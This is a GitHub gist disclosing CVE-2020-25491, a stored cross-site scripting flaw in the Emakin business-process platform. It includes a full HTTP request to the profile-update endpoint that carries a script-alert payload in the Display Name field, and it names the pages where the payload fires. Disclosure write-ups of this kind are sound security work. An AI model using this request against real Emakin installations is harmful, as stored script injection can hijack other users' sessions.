Skip to content

Instantly share code, notes, and snippets.

@mhmtayberk

mhmtayberk/CVE-2020-25491.md Secret

Last active December 6, 2021 23:43
Star
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
CVE-2020-25491
Raw
CVE-2020-25491.md

What is Emakin?

Emakin is Process Improvement, Teamwork, Mobility, Compatibility, Safety and Security, Reduced Costs, Higher Revenue, Single Platform software for Businesses.

Companies using Emakin include VakıfBank, Ülker, Katılım Emeklilik, Sabancı, Aegon, Eczacıbaşı, Godiva, Tarsim, A101, Near East Bank and various other institutions.

Based on the companies using Emakin, we can say that the software is used extensively in the Turkey.

What is CVE-2020-25491?

CVE-2020-25491 is a basic Stored XSS. The vulnerability is simple.

The "Display Name" field in the profile editing area (https://vulnerable.com/app/#/profile) in the top menu is affected by the related vulnerability.

Request:

POST /rpc/membership/setProfile HTTP/1.1
Host: vulnerable.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 807
Origin: https://vulnerable.com
Connection: close
Referer: https://vulnerable.com/app/
Cookie: _fbp=fb.2.1598889391208.495488426; cultPref=en-US; cookieToken=D5D4DB9DB3DAD8D77D8C522DCF252136F15DAA85C5F217D42F34EAB79E6F30D346CE7128F84A53911E9E81B947E4ED4D2384F649CDCE2ED20FC53ED1E6CAC816977884D841DD7EAAA9C378E9CB37F51103E7A42B; AKOpenAuth=C52389963AF70A290721BC7C7B4BE9F062152850C92C5C9B48AB80ED00EFCCF074D63D56C2C340EC61802827BEAFF995; .ASPXAUTH=5F48AA8100055D6A13A71418D07796D507B770DA1FD64EC7BBBF367E464FD06A585C11D72EB6383F6E05465862E7025FA37498078450FB797AC4E2EC0DDA1BC99FB0E76B389F78F64F3DA853290CFE4D124E9BAE40F0F231C1C61756483B5A0E7645D713181693BBF1927933791D5D0EBAF52FE1A30A1829E6B7DF795152E333F85719315F606AE9383EF427CC842F1D4B15D12D178108E332CE7387AC74EE932B0300853BF62B000BC321A49B28CDD983D70DABFB45E1565DAD7068FC6C4CD201EE40171A31694C554F0470206EEC1DA1A505D0

{"profile":"<UserProfile><Properties><Name/><Surname/><DisplayName>&lt;script&gt;alert('1337')&lt;/script&gt;</DisplayName><EMailAddress>mail@vulnerable.com</EMailAddress><Language Caption=\"English (American Samoa)\">en-AS</Language><DateFormat Caption=\"Auto Format\"/><Theme Caption=\"Default\"/></Properties><DomainTheme>Blocks</DomainTheme><Themes><Theme>Blocks</Theme><Theme>Blue</Theme><Theme>Clean</Theme><Theme>Sun</Theme></Themes><Ticket>E52FEF99EB0C4A5FED7AE7AF917040A732C0C69182F331CBC4D0F3F0689246AB1E61492A11C75F61E0989CA9B09E553E7FBA7E7F850D9F872E5FE3BCAFC38359C3E01C53D8E83D2FABE270455C200866182ADDBA</Ticket><Logons><Logon><Provider>Organization</Provider></Logon><Logon><Provider>LDAP</Provider></Logon></Logons><ImageFile Caption=\"\" Url=\"\"/><ImageUrl/></UserProfile>"}

You can see the payload is: <script>alert('1337')</script>

Then you can see that the vulnerability is triggered on the Activity Stream (https://vulnerable.com/app/#/activitystream) and Work Item (https://vulnerable.com/app/#/workitem/WorkItemId) pages.

For more details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-25491

For more blogposts: https://ayberk.ninja/

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment